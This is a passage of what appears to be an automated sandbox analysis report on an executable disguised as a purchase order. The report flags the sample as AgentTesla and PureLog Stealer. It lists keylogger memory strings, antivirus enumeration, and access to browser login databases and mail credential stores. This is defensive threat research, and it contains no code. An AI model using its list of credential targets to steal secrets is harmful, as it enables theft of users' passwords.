                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q9<b>[ Program Manager]</b> (27/09/2024 06:43:05)<br>{Win}rTH
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q3<b>[ Program Manager]</b> (27/09/2024 06:43:05)<br>
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q><b>[ Program Manager]</b> (27/09/2024 06:43:05)<br>{Win}r{Win}TH
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q?<b>[ Program Manager]</b> (27/09/2024 06:43:05)<br>{Win}r{Win}rTH
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q8<b>[ Program Manager]</b> (27/09/2024 06:43:05)<br>{Win}TH
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002B9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Time: 11/24/2024 00:19:36<br>User Name: user<br>Computer Name: 506407<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (27/09/2024 06:43:05)<br>{Win}r{Win}r
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 6.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ctsdvwT.exe.3a630e0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ctsdvwT.exe.3a284c0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ctsdvwT.exe.3a630e0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ctsdvwT.exe.3cc9990.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ctsdvwT.exe.3cc9990.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ctsdvwT.exe.3a284c0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1877432434.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1963628997.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe PID: 6752, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7060, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 3684, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 6840, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.2df3adc.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ctsdvwT.exe.2cc398c.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ctsdvwT.exe.2cc398c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.2df3adc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1760927897.00000000053C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1867946503.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1755288317.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 6.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ctsdvwT.exe.3a630e0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ctsdvwT.exe.3a284c0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ctsdvwT.exe.3a630e0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ctsdvwT.exe.3cc9990.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ctsdvwT.exe.3cc9990.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.ctsdvwT.exe.3a284c0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1877432434.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1963628997.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.4184465405.000000000322B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
